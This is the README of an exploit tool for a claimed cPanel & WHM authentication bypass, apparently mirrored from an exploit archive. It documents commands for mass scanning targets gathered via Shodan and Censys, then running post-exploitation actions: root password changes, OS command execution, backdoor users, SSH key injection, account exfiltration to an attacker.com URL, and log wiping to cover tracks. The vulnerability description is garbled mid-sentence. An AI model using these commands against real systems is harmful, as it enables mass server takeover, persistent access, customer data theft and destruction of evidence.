Share
## https://sploitus.com/exploit?id=BBB9AEDA-89D0-5471-83A7-388934C96DD4
# CVE-2026-41940 Exploit PoC – cPanel & WHM Authentication Bypass

[![CVE-2026-41940](https://img.shields.io/badge/CVE-2026--41940-critical)](https://vulners.com/cve/CVE-2026-41940)
[![CVSS](https://img.shields.io/badge/CVSS-10.0-red)](https://www.first.org/cvss/)
[![Go Version](https://img.shields.io/badge/Go-1.20+-blue)](https://golang.org/)
[![License](https://img.shields.io/badge/License-MIT-green)](https://opensource.org/licenses/MIT)

**Tool by:** [Ishan Oshada](https://ishanoshada.com) | [GitHub](https://github.com/ishanoshada)

> **⚠️ FOR AUTHORIZED SECURITY TESTING ONLY. Unauthorized use is illegal.**



![1](/imgs/1.jpeg)



---

## πŸ“‹ Table of Contents

- [Vulnerability Overview](#vulnerability-overview)
- [Exploit Chain](#exploit-chain-4-stages)
- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage Examples](#usage-examples-table)
- [Post-Exploit Actions](#post-exploit-actions)
- [Interactive Shell Commands](#interactive-shell-commands)
- [Mass Scanning with urls.txt](#mass-scanning-with-urlstxt)
- [Output Examples](#output-examples)
- [Options Reference](#options-reference)
- [Affected Versions](#affected-versions)
- [Building for All Platforms](#building-for-all-platforms)
- [FAQ & Troubleshooting](#faq--troubleshooting)
- [Disclaimer](#disclaimer)
- [Author](#author)

---





![2](/imgs/2.jpeg)



## Vulnerability Overview

**CVE-2026-41940** is a **CRLF injection** vulnerability in cPanel & WHM (versions /json-api/version` | Verify root access – success = 200 + version data |

---

## Features

- βœ… **Single & mass scanning** (file input, stdin pipe)
- βœ… **Threaded scanning** (control concurrency up to 100+ threads)
- βœ… **Verbose mode** (`--verbose`) – shows full HTTP requests/responses
- βœ… **JSON output** (auto‑saves when a vulnerable target is found)
- βœ… **10 post‑exploit actions** (see table below)
- βœ… **Cross-platform** (Windows, Linux, macOS)
- βœ… **No external dependencies** (only Go standard library)
- βœ… **Colourful terminal output** with clear boxed results
- βœ… **Session persistence** – keep-alive mechanism
- βœ… **Interactive WHM shell** with command history

---

## Installation

### Prerequisites
- Go 1.20 or higher ([Download](https://golang.org/dl/))

### Clone Repository

```bash
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC
```

### Build Executable

#### Windows
```cmd
go build -o cpanel_sniper.exe main.go
```

#### Linux / macOS
```bash
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
```

### Run Directly (No Build)
```bash
go run main.go -u https://target.com:2087
```

---

## Quick Start

```bash
# Basic scan
go run main.go -u https://target.com:2087

# List all cPanel accounts
go run main.go -u https://target.com:2087 -action list

# Interactive WHM shell
go run main.go -u https://target.com:2087 -action shell

# Mass scan with urls.txt
go run main.go -l urls.txt -t 20 -o results.json
```

---

## Usage Examples (Table)

| # | Purpose | Command |
|---|---------|---------|
| 1 | **Basic single target scan** | `go run main.go -u https://target.com:2087` |
| 2 | **List all cPanel accounts** | `go run main.go -u https://target.com:2087 -action list` |
| 3 | **Change root password** | `go run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"` |
| 4 | **Execute system command** | `go run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"` |
| 5 | **Get server information** | `go run main.go -u https://target.com:2087 -action info` |
| 6 | **Create backdoor user** | `go run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"` |
| 7 | **Create API token (stealthy)** | `go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken` |
| 8 | **Inject SSH key** | `go run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."` |
| 9 | **Dump & exfiltrate account** | `go run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload` |
| 10 | **Wipe logs & cover tracks** | `go run main.go -u https://target.com:2087 -action wipe` |
| 11 | **Interactive WHM shell** | `go run main.go -u https://target.com:2087 -action shell` |
| 12 | **Mass scan from file** | `go run main.go -l urls.txt -t 20 -o results.json` |
| 13 | **Save results to JSON** | `go run main.go -u https://target.com:2087 -o scan_results.json` |
| 14 | **Enable verbose debugging** | `go run main.go -u https://target.com:2087 --verbose` |
| 15 | **Pipe from other tools** | `cat urls.txt \| go run main.go -t 20` |
| 16 | **Increase timeout** | `go run main.go -u https://target.com:2087 -timeout 30` |

---

## Post-Exploit Actions

| Action | Flag | Description | Stealth Level |
|--------|------|-------------|---------------|
| `list` | `-action list` | List all cPanel accounts | Low |
| `passwd` | `-action passwd -passwd NEWPASS` | Change root password (noisy) | High (detectable) |
| `cmd` | `-action cmd -cmd "id"` | Execute OS commands | Medium |
| `info` | `-action info` | Show hostname, load, version | Low |
| `adduser` | `-action adduser -new-user U -new-domain D` | Create backdoor cPanel user | Medium |
| `apitoken` | `-action apitoken [-tokenname NAME]` | Generate persistent API token | **Very Low** |
| `sshkey` | `-action sshkey -sshkey "ssh-rsa..."` | Inject SSH public key into root | **Very Low** |
| `dumpacct` | `-action dumpacct -dumpuser USER -exfil URL` | Backup & exfiltrate account | Medium |
| `wipe` | `-action wipe` | Disable WAF, clear logs, wipe history | **Cover tracks** |
| `shell` | `-action shell` | Interactive WHM shell | Low |

---

## Interactive Shell Commands

Once inside the shell (`-action shell`), use these commands:

| Command | Description | Example |
|---------|-------------|---------|
| `accounts` | List all cPanel accounts | `accounts` |
| `passwd ` | Change root password | `passwd MyNewPass123!2006` |
| `exec ` | Execute system command | `exec "cat /etc/passwd"` |
| `info` | Show server information | `info` |
| `version` | Show cPanel version | `version` |
| `help` | Show available commands | `help` |
| `exit` | Exit shell | `exit` |

---

## Mass Scanning with urls.txt

The repository includes `urls.txt` with **1000 example targets** for mass scanning.

### urls.txt Format
```
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...
```

### Mass Scan Commands

```bash
# Basic mass scan (10 threads)
go run main.go -l urls.txt

# Fast mass scan (50 threads, save results)
go run main.go -l urls.txt -t 50 -o results.json

# Mass scan with post-exploit action
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# Mass scan with verbose output
go run main.go -l urls.txt -t 10 --verbose

# Mass scan with increased timeout (slow networks)
go run main.go -l urls.txt -t 30 -timeout 30
```

### Generate urls.txt Yourself

```bash
# Generate IP range (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# Generate IP range (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# From Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# From Censys
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt
```

---

## Output Examples

### Vulnerable Target Found

```
╔════════════════════════════════════════════════════════════════╗
β•‘                    VULNERABLE TARGET DETECTED                  β•‘
╠════════════════════════════════════════════════════════════════╣
β•‘ Target: https://target.example.com:2087                        β•‘
β•‘ Token: /cpsess1234567890                                       β•‘
β•‘ Version: 11.76.0.22                                            β•‘
β•‘ Session: :od2aMhg5zJeQunUy...                                  β•‘
β•‘ API URL: https://target.example.com:2087/cpsess1234567890/json-api/version β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

[+] Action: LIST
    β€’ User: admin | Domain: example.com
    β€’ User: backup | Domain: backup.example.com
    β€’ User: client1 | Domain: client1.com
```

### Summary Output

```
════════════════════════════════════════════════════════════════════
                    SCAN COMPLETE SUMMARY
════════════════════════════════════════════════════════════════════
  Total Targets Scanned: 1000
  Vulnerable Targets: 47
  Time Elapsed: 125.34 seconds

VULNERABLE TARGETS:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      Token: /cpsess1111111111
      Version: 11.76.0.22
      Session: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      Token: /cpsess2222222222
      Version: 11.86.0.15
      Session: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      Token: /cpsess3333333333
      Version: 11.118.0.42
      Session: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[βœ“] Results saved to: results.json
```

---

## Options Reference

| Option | Type | Default | Description |
|--------|------|---------|-------------|
| `-u` | string | - | Target URL (e.g., https://example.com:2087) |
| `-l` | string | - | File with targets (one per line) |
| `-t` | int | 10 | Number of concurrent threads |
| `-action` | string | - | Post-exploit action |
| `-passwd` | string | - | New password (for passwd/adduser) |
| `-cmd` | string | - | Command to execute (for cmd action) |
| `-new-user` | string | - | Username for adduser action |
| `-new-domain` | string | - | Domain for adduser action |
| `-tokenname` | string | - | Name for API token (apitoken action) |
| `-sshkey` | string | - | Public SSH key to inject (sshkey action) |
| `-dumpuser` | string | - | Username to backup (dumpacct action) |
| `-exfil` | string | - | Remote URL for exfiltration (dumpacct action) |
| `-o` | string | - | Output JSON file (auto-saves when found) |
| `--verbose` | bool | false | Show HTTP requests/responses |
| `-h` | bool | false | Show help menu |

---

## Affected Versions

| Branch | Patched Version | Vulnerable < |
|--------|----------------|--------------|
| 11.110 | 11.110.0.97 | 11.110.0.96 |
| 11.118 | 11.118.0.63 | 11.118.0.62 |
| 11.126 | 11.126.0.54 | 11.126.0.53 |
| 11.132 | 11.132.0.29 | 11.132.0.28 |
| 11.134 | 11.134.0.20 | 11.134.0.19 |
| 11.136 | 11.136.0.5 | 11.136.0.4 |

---

## Building for All Platforms

### Windows
```cmd
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087
```

### Linux
```bash
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087
```

### macOS (Intel)
```bash
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go
```

### macOS (Apple Silicon M1/M2/M3)
```bash
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go
```

### Cross-Compile All Platforms
```bash
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go
```


---

## Directory Structure

```
CVE-2026-41940-Exploit-PoC/
β”œβ”€β”€ README.md           # Documentation
β”œβ”€β”€ main.go             # Main source code
β”œβ”€β”€ urls.txt            # 1000 example targets
β”œβ”€β”€ go.mod              # Go module file
β”œβ”€β”€ .gitignore          # Git ignore file
└── results.json        # Output file (generated)
```

---

## Disclaimer

This tool is for **educational purposes and authorised penetration testing only**.  

Unauthorised access to computer systems is illegal under:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act - UK
- Information Technology Act - India
- Similar laws worldwide

**The author assumes no liability for misuse. Use at your own risk.**

By using this tool, you agree that you have proper authorisation to test the target systems.

---

## Author

**Ishan Oshada**

- πŸ”— Website: [ishanoshada.com](https://ishanoshada.com)
- πŸ™ GitHub: [github.com/ishanoshada](https://github.com/ishanoshada)
- πŸ“§ Email: ic31908@gmail.com

---


![Views](https://dynamic-repo-badges.vercel.app/svg/count/7/Repository%20Views/cppoc)


## Support

If you find this tool useful:
- ⭐ Star the repository on GitHub
- πŸ”„ Share with security community
- πŸ“ Report issues via GitHub Issues

---

**Happy Hacking!** πŸš€

*Remember: With great power comes great responsibility. Use ethically.*